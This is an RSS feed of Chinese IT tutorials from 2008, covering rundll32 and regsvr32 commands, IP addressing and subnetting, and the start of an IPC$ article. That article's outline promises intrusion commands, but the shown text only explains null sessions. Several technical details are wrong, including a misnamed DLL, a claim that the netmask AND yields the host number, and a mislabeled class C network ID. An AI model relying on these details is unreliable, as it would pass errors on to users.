将指定的萤屏保护档案设置为Windows的屏保，并显示萤屏保护属性视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0 <BR>     功能: 显示“控制面板－系统属性－传统”属性视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1 <BR>     功能: 显示“控制面板－系统属性－设备管理器”属性视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2 <BR>     功能: 显示“控制面板－系统属性－硬体配置档案”属性视窗。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3 <BR>     功能: 显示“控制面板－系统属性－性能”属性视窗。 <BR>     命令列: rundll32.exe user.exe,restartwindows <BR>     功能: 强行关闭所有程式并重启机器。 <BR>     命令列: rundll32.exe user.exe,exitwindows <BR>     功能: 强行关闭所有程式并关机。 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl <BR>     功能: 显示“拨号属性”选项视窗 <BR>     命令列: rundll32.exe shell32.dll,Control_RunDLL themes.cpl <BR>     功能: 显示“桌面主旨”选项面板 <BR>     当然，不止是VisualBasic，象Delphi.VisualC＋＋等其他程式设计语言也可以通过呼叫外部命令的方法来使用Rundll的这些功能，具体方法这里就不再详细叙述了。灵活的使用Rundll,一定会使你的程式设计轻轻松松，达到事半功倍的效果！</FONT></P>
<P><FONT face=Verdana></FONT> </P>]]></description>
</item>

<item>
<title><![CDATA[REGSVR32修复系统故障]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2556</link>
<author>IT梦工场</author>
<pubDate>2008-8-27 10:20:12</pubDate>
<description><![CDATA[<P><FONT face=Verdana>Regsvr32命令修复系统故障</FONT></P>
<P><FONT face=Verdana>Regsvr32命令是 Windows 系统提供的一个实用工具，它用来向系统注册控件或者卸载控件，利用该命令，可找回系统丢失的功能。Regsvr32命令以命令行方式运行，其命令格式为： Regsvr32 [/u] Filename, Filename是控件文件名，不带参数 u 就是注册控件，带参数 u 就是卸载控件。<BR>l. 恢复图片预览功能： Windows XP的图片预览功能，对应的控件文件为 thurnbvw.dll。 如果该功能损坏，可单击“开始”一“运行” , 在“打开”框中输人：" Regsvr32 Thurnbvw. dll" ，单击“确定”执行命令，这时就会弹出提示框： " DllRegisterServer in Thumbvw.dll succeeded." ，这表明控件注册成功。重新启动电脑，WindowsXP 的图片预览功能便恢复了。<BR>　　2. 恢复ZIP功能：Windows XP 系统提供了ZIP功能，虽然功能不算强大，但不需要第三方软件就可打开ZIP文件，而且可以把ZIP压缩文件当作文件夹使用，也算是比较方便、实用的功能。如果该功能损坏，可在运行框中执行“Regsvr32 ZIPfldr.dll”命令，然后重新启动电脑即可恢复。<BR>3. 恢复IE新窗口打开超级链接功能：在IE中有两种超级链接，一种是在当前页面跳转的链接，另一种是弹出新窗口的链接，对第一种链接也可按住Shift键在新窗口中打开。很多人都遇到过不能在新窗口打开链接的麻烦事儿，这个问题也是因控件注册信息丢失引起的。解决办法是：在运行框中分别执行三个命令：“Regsvr32 Actxprxy.dll ”、“Regsvr32 Shdocvw.dll”、 " Regsvr32 Oleaut32.dll ”。一这三个控件注册成功后，重新启动电脑， IE 就恢复正常了。<BR>　　4. 恢复FSO功能：现在有很多人利用自己的电脑建论坛、网站，论坛或者动态网站程序都可进行在线文件管理，管理员通过页面就可操作文件，但经常有人反映自己的论坛、网站不能在线管理文件，这是因为服务器的FSO功能没有开通或者出现故障，解决办法是：在服务器的运行框中执行“Regsvr32 Sorrun.dll " ，最后重启服务器即可开通／恢复FSO功能。<BR>　　5. 恢复在线升级功能：在Windows的“开始”菜单的顶端，有一个“Windows Update”项，可以快捷的对系统进行在线升级打补。但有时会发现无法进行在线升级，要解决这个故障，只要在运行框中执行 " Regsvr32 Wupdinfo.dll " ，重启电脑即可解决。</FONT></P>]]></description>
</item>

<item>
<title><![CDATA[REGSVR32使用方法]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2555</link>
<author>IT梦工场</author>
<pubDate>2008-8-27 10:19:52</pubDate>
<description><![CDATA[<P><FONT face=Verdana>Regsvr32使用方法</FONT></P>
<P><FONT face=Verdana>　　使用过activex的人都知道，activex不注册是不能够被系统识别和使用的，一般安装程序都会自动地把它所使用的activex控件注册，但如果你拿到的一个控件需要手动注册怎么办呢？如果修改注册表那就太麻烦了，在windows的system文件夹下有一个regsvr32.exe的程序，它就是windows自带的activex注册和反注册工具。它的用法为： </FONT></P>
<P><FONT face=Verdana>　　“regsvr32 [/s] [/n] [/i(:cmdline)] dllname”。其中dllname为activex控件文件名，建议在安装前拷贝到system文件夹下。 </FONT></P>
<P><FONT face=Verdana>　　参数有如下意义： </FONT></P>
<P><FONT face=Verdana>　　/u——反注册控件 </FONT></P>
<P><FONT face=Verdana>　　/s——不管注册成功与否，均不显示提示框 </FONT></P>
<P><FONT face=Verdana>　　/c——控制台输出 </FONT></P>
<P><FONT face=Verdana>　　/i——跳过控件的选项进行安装(与注册不同) </FONT></P>
<P><FONT face=Verdana>　　/n——不注册控件，此选项必须与/i选项一起使用</FONT></P>]]></description>
</item>

<item>
<title><![CDATA[REGSVR32_用法和错误消息的说]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2554</link>
<author>IT梦工场</author>
<pubDate>2008-8-27 10:19:26</pubDate>
<description><![CDATA[<P><FONT face=Verdana>Regsvr32 用法和错误消息的说明 </FONT></P>
<P><FONT face=Verdana>对于那些可以自行注册的对象链接和嵌入 (OLE) 控件，例如动态链接库 (DLL) 文件或 ActiveX 控件 (OCX) 文件，您可以使用 Regsvr32 工具 (Regsvr32.exe) 来将它们注册和取消注册。</FONT></P>
<P><FONT face=Verdana>Regsvr32.exe 的用法 </FONT></P>
<P><FONT face=Verdana>RegSvr32.exe 具有以下命令行选项： Regsvr32 [/u] [/n] [/i[:cmdline]] dllname </FONT></P>
<P><FONT face=Verdana>   /u - Unregister server<BR/> <BR>   /i - Call DllInstall passing it an optional [cmdline]; <BR>        when used with /u calls dll uninstall <BR>   /n - do not call DllRegisterServer; this option must <BR>        be used with /i </FONT></P>
<P><FONT face=Verdana>当您使用 Regsvr32.exe 时，它会尝试加载该组件并调用它的 DLLSelfRegister 函数。如果此尝试成功，Regsvr32.exe 会显示一个指示成功的对话框。如果此尝试失败，Regsvr32.exe 会返回一条错误消息，其中可能会包括一个 Win32 错误代码。要查看 Win32 错误代码的列表，请参见下面的 Microsoft Web 站点：  <BR>http://msdn.microsoft.com/library/en-us/netdir/adsi/win32_error_codes.asp  </FONT></P>
<P><FONT face=Verdana>例如，要手动注册 Sample.ocx ActiveX 控件，请在 MS-DOS 提示符处键入以下命令：  <BR>c:\regsvr32.exe sample.ocx </FONT></P>
<P><FONT face=Verdana>Regsvr32.exe 错误消息 </FONT></P>
<P><FONT face=Verdana>以下列表介绍了 RegSvr32 错误消息和可能的原因。  </FONT></P>
<P><FONT face=Verdana>Unrecognized flag:/invalid_flag </FONT></P>
<P><FONT face=Verdana>键入的标志或开关组合无效（请参阅本文中的“Regsvr32.exe 的用法”一节）。  </FONT></P>
<P><FONT face=Verdana>No DLL name specified. </FONT></P>
<P><FONT face=Verdana>未包括 .dll 文件名（请参阅本文中的“Regsvr32.exe 的用法”一节）。  </FONT></P>
<P><FONT face=Verdana>Dllname was loaded, but the DllRegisterServer or DllUnregisterServer entry point was not found. </FONT></P>
<P><FONT face=Verdana>Dllname 不是 .dll 或 .ocx 文件。例如，键入 regsvr32 wjview.exe 就会生成该错误消息。  </FONT></P>
<P><FONT face=Verdana>Dllname is not an executable file and no registration helper is registered for this file type. </FONT></P>
<P><FONT face=Verdana>Dllname 不是可执行文件（.exe、.dll 或 .ocx）。例如，键入 regsvr32 autoexec.bat 就会生成该错误消息。 </FONT></P>
<P><FONT face=Verdana>Dllname was loaded, but the DllRegisterServer or DllUnregisterServer entry point was not found. </FONT></P>
<P><FONT face=Verdana>Dllname 可能未导出，或者内存中可能有损坏的 Dllname 版本。请考虑使用 Pview 来检测该文件并删除它。  </FONT></P>
<P><FONT face=Verdana>Dllname is not self-registerable or a corrupted version is in memory. </FONT></P>
<P><FONT face=Verdana>例如，键入 regsvr32 icwdial.dll 后就会返回该错误消息，因为 Icwdial.dll 文件不能自行注册。如果您怀疑内存中有损坏的 Dllname 版本，请尝试重新启动计算机，或重新提取该文件的原始版本。如果您运行的是 Windows NT，可能需要使用 Microsoft Windows NT Server 4.0 资源工具包 中的 Kill 或 Pview 工具。有关其他信息，请单击以查看以下 Microsoft 知识库文章：  <BR>197155 如何终止孤立进程  </FONT></P>
<P><FONT face=Verdana>OleInitialize failed (or OleUninitialize failed). </FONT></P>
<P><FONT face=Verdana>Regsvr32 必须先初始化 COM 库，然后才能调用所需的 COM 库函数并在关闭时撤消对该库的初始化。如果对 COM 库进行初始化或撤消初始化的尝试失败，就会出现这些错误消息。例如，Ole32.dll 文件可能已经损坏，或者其版本有误。  </FONT></P>
<P><FONT face=Verdana>LoadLibrary("Dllname") failed.GetlastError returns 0x00000485 </FONT></P>
<P><FONT face=Verdana>在 Winerror.h 中，0x00000485 = 1157 (ERROR_DLL_NOT_FOUND)，表示“找不到运行该应用程序所需的某个库文件”。例如，键入 regsvr32 missing.dll 后，如果找不到 Missing.dll 文件，就会返回该错误消息。  </FONT></P>
<P><FONT face=Verdana>LoadLibrary("Dllname") failed.GetLastError returns 0x00000002 </FONT></P>
<P><FONT face=Verdana>在 Winerror.h 中，0x00000002 = 2 (ERROR_FILE_NOT_FOUND)，表示“系统找不到指定的文件”。换言之，系统找不到相关的 DLL。例如，如果键入 regsvr32 icwdial.dll，而此时缺少 Tapi32.dll（依赖项），就会返回该错误消息。  </FONT></P>
<P><FONT face=Verdana>LoadLibrary("dskmaint.dll") failed.GetLastError returns 0x000001f </FONT></P>
<P><FONT face=Verdana>在 Winerror.h 中，0x000001f = 31 (ERROR_GEN_FAILURE)，表示“附加到系统上的设备不能正常工作”。如果您尝试注册 Win16 .dll 文件，就会发生此现象。例如，键入 regsvr32 dskmaint.dll 会返回该错误消息。  </FONT></P>
<P><FONT face=Verdana>DllRegisterServer (or DllUnregisterServer)in Dllname failed.返回代码是：字符串 </FONT></P>
<P><FONT face=Verdana>在 Winerror.h 中搜索字符串。  <BR>Regsvr32.exe 和依赖项 <BR>RegSvr32.exe 依赖于 Kernel32.dll、User32.dll 和 Ole32.dll 文件（在 Windows NT 中，还依赖于 Msvcrt.dll 和 Advapi32.dll 文件）。Regsvr32.exe 会加载您尝试注册或撤消注册的文件及其所有依赖项。如果缺少必需的文件或者它们已损坏，该进程可能会失败。  </FONT></P>
<P><FONT face=Verdana>您可以使用 Depends.exe 来确定您尝试注册或撤消注册的文件的依赖项。在 Microsoft Windows 98 资源工具包 和 Microsoft Windows NT 4.0 资源工具包 支持工具中都提供了 Depends.exe。 <BR>247024 Tools Included with the Microsoft Windows 98 Resource Kit  </FONT></P>]]></description>
</item>

<item>
<title><![CDATA[MFM1992文件问题]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2553</link>
<author>IT梦工场</author>
<pubDate>2008-8-27 10:19:01</pubDate>
<description><![CDATA[<P><FONT face=Verdana>Mfm1992文件问题</FONT></P>
<P><FONT face=Verdana>　　问：我的桌面上出现了一个名为Mfm1992的视窗图案的图标，路径是C:\Windows\Desktop，占用45056字节，请问它是什么文件？</FONT></P>
<P><FONT face=Verdana>　　答：“Mfm1992”是中文输入法“智能ABC”的记录文件。你的电脑中出现“Mfm1992”文件是由于你使用了“智能ABC”输入法作为中文录入的方式，这也应该算是“智能ABC”输入法的一个Bug，该文件可以随时删除而不会影响系统，不必担心。<BR></FONT></P>]]></description>
</item>

<item>
<title><![CDATA[IP寻址技术]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2552</link>
<author>IT梦工场</author>
<pubDate>2008-8-27 10:18:30</pubDate>
<description><![CDATA[<P><FONT face=Verdana>IP寻址技术     <BR>1969年仅有四节点的ARPA网在美国实验成功，有谁能想到由此演化的互联网会成为世界<BR>最大的数据网呢。随着计算机的普及，上网人数的不断增加，越来越多的企业把目光投<BR>向互联网。支撑Internet运转的关键是IP技术，在此详细讲解其基本概念及IP的寻址过<BR>程。</FONT></P>
<P><FONT face=Verdana>MAC地址(位于数据链路层)</FONT></P>
<P><FONT face=Verdana>介质访问控制(Media Access Control)地址一般位于网卡中，用于标识网络设备，控制<BR>对网络介质的访问。例如，网络设备要访问传输电缆(网线，位于物理层)，必须具备一<BR>个MAC地址，发送的数据要到达目的地，必须知道目的地的MAC地址。因为一个网卡具有<BR>唯一的MAC地址，所以又叫做物理地址。</FONT></P>
<P><FONT face=Verdana>网络地址(位于网络层)</FONT></P>
<P><FONT face=Verdana>因为一个网络地址可以根据逻辑分配给任意一个网络设备，所以又叫逻辑地址。网络地<BR>址通常可分成网络号和主机号两部分，用于标识网络和该网络中的设备。采用不同网络<BR>层协议，网络地址的描述是不同的，如IPX，以PAD.0134.02d3.es50为例，PAD为网络号<BR>，而0134.02d3.es50是标识该网络中设备的主机号。IP协议则用32位二进制来表示网络<BR>地址，一般就叫做IP地址。MAC地址用于网络通信，网络地址是用于确定网络设备位置<BR>的逻辑地址。</FONT></P>
<P><FONT face=Verdana>IP地址</FONT></P>
<P><FONT face=Verdana>为了适应不同大小的网络需求，所有的IP地址被分为不同的类别―Class A、B、C，这<BR>就是有类IP地址。可用IP地址的前三位做区分。在计算网络支持的主机数时要减2，是<BR>因为全0的主机号用于标识该网络，全1的主机号是该网络的广播地址。广播地址用于标<BR>识网络的所有主机，数据发向广播地址就相当于向全网络主机广播。</FONT></P>
<P><FONT face=Verdana>或者以网络掩码(netmask)作区分。网络掩码和IP一样也是32位二进制数，把网络掩码<BR>和IP地址逻辑与得出的结果就是主机号。</FONT></P>
<P><FONT face=Verdana>有类IP地址(Class IP)的局限</FONT></P>
<P><FONT face=Verdana>网络的发展出乎设计者的想象。32位的IPv4(IP的第四版本)虽有232个IP地址，但是将<BR>IP地址分类的方法，理想化地把网络分为千万级、万级、百级，僵化的选择导致了大量<BR>的浪费。而随着网上站点的增加，用于维持网络间通信的路由器路由信息的不断增长，<BR>最终将导致路由器无法负荷，只能将部分站点的路由信息丢弃，造成不能访问。</FONT></P>
<P><FONT face=Verdana>保留地址</FONT></P>
<P><FONT face=Verdana>在Internet中有部分IP地址是保留作内部网络使用的。采用保留地址，每个局域网都可<BR>以为内部网络的众多主机分配一个IP地址。通过NAT地址转换，在访问外部网络时将保<BR>留地址转为真实地址，能够满足内部网络采用TCP/IP协议的同时，也保持了Internet上<BR>的地址唯一性。</FONT></P>
<P><FONT face=Verdana>如果内部网络不连入Internet的话，实际上是可以使用任何一类地址。否则必须保证连<BR>通网络的地址唯一性。</FONT></P>
<P><FONT face=Verdana>子网化(Subnetting)</FONT></P>
<P><FONT face=Verdana>把一个网络再细分成数个小网，就叫子网化。假设一家公司有一个B类地址130.5.0.0，<BR>可是需要为各地的分公司分别建立网络。130.5是其网络号，把主机号(16位)分成子网<BR>号(8位)和子网主机号(8位)两部分，共有子网28-2个，这样就可以为每个分公司分配一<BR>个子网。</FONT></P>
<P><FONT face=Verdana>子网化是一种解决IP地址紧张的方案。此外，子网化还可以防止路由信息的无限制增<BR>长。由于同一网络不同子网的网络号是一致的，所以Internet路由器到各个子网的路由<BR>是一致的。</FONT></P>
<P><FONT face=Verdana>子网化的另一个好处就是无论该网络的拓扑如何改变都不会影响到Internet的路由，<BR>Internet路由器也就不用花费大量的资源去计算更新路由信息。</FONT></P>
<P><FONT face=Verdana>如前所述IP是用于寻址的，所以子网在此就相当于分级寻址。先由Internet路由器根据<BR>网络号定位到目的网络，再由内部的路由器根据扩展网络号进一步定位到目的网络中的<BR>子网络。</FONT></P>
<P><FONT face=Verdana>路由器与路由协议</FONT></P>
<P><FONT face=Verdana>路由协议分为内部网关协议IGP和外部网关协议EGP两种，各用于自治系统内部和自治系<BR>统之间，其中IGP又分为距离向量和链路向量。距离向量是定期向相邻的路由器交流整<BR>个路由表的信息，如RIPv1、IGRP。而链路向量只在链路状态发生改变时向所有的路由<BR>器交流链路状态信息，如OSPF。而象EIGRP则同时具有两种协议的特点。</FONT></P>
<P><FONT face=Verdana>可变长度子网掩码(VLSM)</FONT></P>
<P><FONT face=Verdana>在使用有类别路由协议时，因为不能跨主网络交流掩码，所以必须连续寻址且要求同一<BR>个主网络只能用一个网络掩码。对于大小不同的子网，只能按最大子网的要求设置子网<BR>掩码，造成了浪费。尤其是连接路由器的网络，明明只需要两个IP地址，分配的地址却<BR>和最大的子网一样。</FONT></P>
<P><FONT face=Verdana>无类别路由协议的提出为VLSM的实施提供了可能。对同一个主网络采用不同的子网掩码<BR>，能节省大量的地址空间，允许非连续寻址则使网络的规划更灵活。</FONT></P>
<P><FONT face=Verdana>路由汇总(Route Summarization)</FONT></P>
<P><FONT face=Verdana>随着企业上网工程的深入，路由器的增多不但让路由表变大，增加查找的时间，而且加<BR>大了数据处理转发的过程。</FONT></P>
<P><FONT face=Verdana>路由汇总要求地址连续(是通配符掩码的要求，只有通配符掩码才能用一条路由标识多<BR>个网络，实现路由汇总)，减少了路由表的条目；在地址连续下，路由器可以根据IP地<BR>址的前几位决定将数据发向目的地，以加快路由转发的处理过程。</FONT></P>
<P><FONT face=Verdana>路由器工作原理与第三层交换</FONT></P>
<P><FONT face=Verdana>第三层交换是在第二层交换机上插入一个路由模块，利用交换机的高速背板路由模块和<BR>其它的交换模块高速交换数据。在这种情况下，当A主机要向B主机发送数据时，A将B的<BR>IP地址和自己的相比较。如果确认B与A是同一个子网，A将发送一个广播ARP，B返回其<BR>MAC地址；于是A用MAC封装数据后，发向交换机，交换机通过查找MAC与端口对应表将数<BR>据发向B主机的端口。如果A与B不在同一子网，A向预先设置的缺省网关(就是路由模块)<BR>发送ARP请求。路由模块查找是否在以往的交换中已保存有B主机的MAC地址，有则返回<BR>给A主机，否则对B所在子网广播ARP，将获得的MAC保存再发回给A。以后A要再发送数据<BR>给B，就不用通过路由模块，直接的MAC封装，使子网间的数据交换速度和同一子网的相<BR>差无几。</FONT></P>
<P><FONT face=Verdana>为了解决IP地址日愈紧张的情况，IPv6新一代的IP地址规范已经推出，通过将IPv4的32<BR>位二进码升级到IPv6的128位，地址紧张的情况将一去不复返。<BR> <BR> <BR></FONT></P>]]></description>
</item>

<item>
<title><![CDATA[IP地址常识]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2551</link>
<author>IT梦工场</author>
<pubDate>2008-8-25 12:36:02</pubDate>
<description><![CDATA[<FONT face=Verdana>谈到因特网，IP地址就不能不提，因为无论是从学习还是使用因特网的角度来看，IP地址都是一个十分重要的概念，INTERNET的许多服务和特点都是通过IP地址体现出来的。 <BR>　　一、IP地址的概念<BR>　　我们知道因特网是全世界范围内的计算机联为一体而构成的通信网络的总称。联在某个网络上的两台计算机之间在相互通信时，在它们所传送的数据包里都会含有某些附加信息，这些附加信息就是发送数据的计算机的地址和接受数据的计算机的地址。象这样，人们为了通信的方便给每一台计算机都事先分配一个类似我们日常生活中的电话号码一样的标识地址，该标识地址就是我们今天所要介绍的IP地址。根据TCP/IP协议规定，IP地址是由32位二进制数组成，而且在INTERNET范围内是唯一的。例如，某台联在因特网上的计算机的IP地址为： <BR>　　　　11010010 01001001 10001100 00000010 <BR>　　很明显，这些数字对于人来说不太好记忆。人们为了方便记忆，就将组成计算机的IP地址的32位二进制分成四段，每段8位，中间用小数点隔开，然后将每八位二进制转换成十进制数，这样上述计算机的IP地址就变成了：210.73.140.2。 <BR>　　二、IP地址的分类<BR>　　我们说过因特网是把全世界的无数个网络连接起来的一个庞大的网间网，每个网络中的计算机通过其自身的IP地址而被唯一标识的，据此我们也可以设想，在INTERNET上这个庞大的网间网中，每个网络也有自己的标识符。这与我们日常生活中的电话号码很相像，例如有一个电话号码为0515163，这个号码中的前四位表示该电话是属于哪个地区的，后面的数字表示该地区的某个电话号码。与上面的例子类似，我们把计算机的IP地址也分成两部分，分别为网络标识和主机标识。同一个物理网络上的所有主机都用同一个网络标识，IP地址的4个字节划分为2个部分，一部分用以标明具体的网络段，即网络标识；另一部分用以标明具体的节点，即主机标识，也就是说某个网络中的特定的计算机号码。例如，盐城市信息网络中心的服务器的IP地址为210.73.140.2，对于该IP地址，我们可以把它分成网络标识和主机标识两部分，这样上述的IP地址就可以写成： <BR>　　　　　网络标识：210.73.140.0 <BR>　　　　　主机标识：　　　　 2　　　　　　　　 <BR>　　　　　合起来写：210.73.140.2 <BR>　　由于网络中包含的计算机有可能不一样多，有的网络可能含有较多的计算机，也有的网络包含较少的计算机，于是人们按照网络规模的大小，把32位地址信息设成三种定位的划分方式，这三种划分方法分别对应于A类、B类、C类IP地址。 <BR>　　1．A类IP地址 <BR>　　一个A类IP地址是指，在IP地址的四段号码中，第一段号码为网络号码，剩下的三段号码为本地计算机的号码。如果用二进制表示IP地址的话，A类IP地址就由1字节的网络地址和3字节主机地址组成，网络地址的最高位必须是“0”。A类IP地址中网络的标识长度为7位，主机标识的长度为24位，A类网络地址数量较少，可以用于主机数达1600多万台的大型网络。 <BR>　　2．B类IP地址 <BR>　　一个B类IP地址是指，在IP地址的四段号码中，前两段号码为网络号码，剩下的两段号码为本地计算机的号码。如果用二进制表示IP地址的话，B类IP地址就由2字节的网络地址和2字节主机地址组成，网络地址的最高位必须是“10”。B类IP地址中网络的标识长度为14位，主机标识的长度为16位，B类网络地址适用于中等规模规模的网络，每个网络所能容纳的计算机数为6万多台。 <BR>　　3．C类IP地址 <BR>　　一个C类IP地址是指，在IP地址的四段号码中，前三段号码为网络号码，剩下的一段号码为本地计算机的号码。如果用二进制表示IP地址的话，C类IP地址就由3字节的网络地址和1字节主机地址组成，网络地址的最高位必须是“110”。C类IP地址中网络的标识长度为21位，主机标识的长度为8位，C类网络地址数量较多，适用于小规模的局域网络，每个网络最多只能包含254台计算机。 <BR>　　除了上面三种类型的IP地址外，还有几种特殊类型的IP地址，TCP/IP协议规定，凡IP地址中的第一个字节以“lll0”开始的地址都叫多点广播地址。因此，任何第一个字节大于223小于240的IP地址是多点广播地址；IP地址中的每一个字节都为0的地址（“0.0.0.0”）对应于当前主机；IP地址中的每一个字节都为1的IP地址（“255．255．255．255”）是当前子网的广播地址；IP地址中凡是以“llll0”的地址都留着将来作为特殊用途使用。 <BR>　　三、IP的寻址规则　　 <BR>　　1.网络寻址规则 <BR>　　A、 网络地址必须唯一。 <BR>　　B、 网络标识不能以数字127开头。在A类地址中，数字127保留给内部回送函数。 <BR>　　C、 网络标识的第一个字节不能为255。数字2５5作为广播地址。 <BR>　　D、 网络标识的第一个字节不能为“0”，“0”表示该地址是本地主机，不能传送。 <BR>　　 2.主机寻址规则 <BR>　　A、主机标识在同一网络内必须是唯一的。 <BR>　　B、主机标识的各个位不能都为“1”，如果所有位都为“1”，则该机地址是广播地址，而非主机的地址。 <BR>　　C、主机标识的各个位不能都为“0”，如果各个位都为“0”，则表示“只有这个网络”，而这个网络上没有任何主机。 <BR>　　四、IP子网掩码概述<BR>　　1.子网掩码的概念 <BR>　　子网掩码是一个32位地址，用于屏蔽IP地址的一部分以区别网络标识和主机标识，并说明该IP地址是在局域网上，还是在远程网上。 <BR>　　2.确定子网掩码数 <BR>　　用于子网掩码的位数决定于可能的子网数目和每个子网的主机数目。在定义子网掩码前，必须弄清楚本来使用的子网数和主机数目。 <BR>　　定义子网掩码的步骤为： <BR>　　A、确定哪些组地址归我们使用。比如我们申请到的网络号为“210.73.a.b”，该网络地址为c类IP地址，网络标识为“210.73”，主机标识为“a.b”。 <BR>　　B、根据我们现在所需的子网数以及将来可能扩充到的子网数，用宿主机的一些位来定义子网掩码。比如我们现在需要12个子网，将来可能需要16个。用第三个字节的前四位确定子网掩码。前四位都置为“1”，即第三个字节为“11110000”，这个数我们暂且称作新的二进制子网掩码。 <BR>　　C、把对应初始网络的各个位都置为“1”，即前两个字节都置为“1”，第四个字节都置为“0”，则子网掩码的间断二进制形式为：“11111111.11111111.11110000.00000000” <BR>　　D、把这个数转化为间断十进制形式为：“255.255.240.0” <BR>这个数为该网络的子网掩码。 <BR>3.IP掩码的标注 <BR>　　A、无子网的标注法 <BR>　　对无子网的IP地址，可写成主机号为0的掩码。如IP地址210.73.140.5，掩码为255.255.255.0，也可以缺省掩码，只写IP地址。 <BR>　　B、有子网的标注法 <BR>　　有子网时，一定要二者配对出现。以C类地址为例。 <BR>　　1.IP地址中的前3个字节表示网络号，后一个字节既表明子网号，又说明主机号，还说明两个IP地址是否属于一个网段。如果属于同一网络区间，这两个地址间的信息交换就不通过路由器。如果不属同一网络区间，也就是子网号不同，两个地址的信息交换就要通过路由器进行。例如：对于IP地址为210.73.140.5的主机来说，其主机标识为00000101，对于IP地址为210.73.140.16的主机来说它的主机标识为00010000，以上两个主机标识的前面三位全是000，说明这两个IP地址在同一个网络区域中。<BR>　　主机地址，例如?10.73.60.1的主机标识为00000001，210.73.60.252的主机标识为11111100，这两个主机标识的前面三位000与011不同，说明二者在不同的网络区域，要交换信息需要通过路由器。其子网上主机号各为1和252。 <BR>　　2.掩码的功用是说明有子网和有几个子网，但子网数只能表示为一个范围，不能确切讲具体几个子网，掩码不说明具体子网号，有子网的掩码格式(对C类地址):主机标识前几位为子网号，后面不写主机，全写0。 <BR>　　五、IP的其他事项　　 <BR>　　1.一般国际互联网信息中心在分配IP地址时是按照网络来分配的，因此只有说到网络地址时才能使用A类、B类、C类的说法； <BR>　　2.在分配网络地址时，网络标识是固定的，而计算机标识是可以在一定范围内变化的，下面是三类网络地址的组成形式： <BR>　　　　A类地址：73.0.0.0 <BR>　　　　B类地址：160.153.0.0 <BR>　　　　C类地址：210.73.140.0 <BR>　　　　上述中的每个0均可以在0~255之间进行变化。 <BR>　　3.因为IP地址的前三位数字已决定了一个IP地址是属于何种类型的网络，所以A类网络地址将无法再分成B类IP地址，B类IP地址也不能再分成C类IP地址。 <BR>　　4.在谈到某一特定的计算机IP地址时不宜使用A类、B类、C类的说法，但可以说主机地址是属于哪一个A类、B类、C类网络了。 <BR>　　通过上面的学习，大家对IP地址肯定有了了解。有了IP地址大家就可以发送电子邮件了，并且可以获得Internet网上的其他信息，例如可以获得Internet上的WWW服务、BBS服务、FTP服务等等。  <BR> <BR></FONT>]]></description>
</item>

<item>
<title><![CDATA[IPC$命令详解]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2550</link>
<author>IT梦工场</author>
<pubDate>2008-8-25 12:35:33</pubDate>
<description><![CDATA[<FONT face=Verdana>
<P><FONT face=Verdana>IPC$命令详解<BR>一 摘要<BR>二 什么是ipc$<BR>三 什么是空会话<BR>四 空会话可以做什么<BR>五 ipc$所使用的端口<BR>六 ipc管道在hack攻击中的意义<BR>七 ipc$连接失败的常见原因<BR>八 复制文件失败的原因<BR>九 关于at命令和xp对ipc$的限制<BR>十 如何打开目标的IPC$共享以及其他共享<BR>十一 一些需要shell才能完成的命令<BR>十二 入侵中可能会用到的命令<BR>十三 对比过去和现今的ipc$入侵<BR>十四 如何防范ipc$入侵<BR>十五 ipc$入侵问答精选</FONT></P>
<P><FONT face=Verdana>一 摘要<BR>注意：本文所讨论的各种情况均默认发生在win NT/2000环境下，win98将不在此次讨论之列。</FONT></P><FONT face=Verdana>
<P><BR>二 什么是ipc$<BR>IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系 统安全性的降低。<BR>平时我们总能听到有人在说ipc$漏洞，ipc$漏洞，其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说，一定是指微软自己安置的那个‘后门’：空会话（Null session）。那么什么是空会话呢？</P>
<P><BR>三 什么是空会话<BR>在介绍空会话之前，我们有必要了解一下一个安全会话是如何建立的。<BR>在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的，建立成功的会话将成为一个安全隧道，建立双方通过它互通信息，这个过程的大致顺序如下： <BR>1）会话请求者（客户）向会话接收者（服务器）传送一个数据包，请求安全隧道的建 <BR>立； <BR>2）服务器产生一个随机的64位数（实现挑战）传送回客户； <BR>3）客户取得这个由服务器产生的64位数，用试图建立会话的帐号的口令打乱它，将结 <BR>果返回到服务器（实现响应）； <BR>4）服务器接受响应后发送给本地安全验证（LSA），LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号，核实本地发生；如果请求的帐号是一个域的帐号，响应传送到域控制器去核实。当对挑战的响应核实为正确 后，一个访问令牌产生，然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。<BR>以上是一个安全会话建立的大致过程，那么空会话又如何呢？</P>
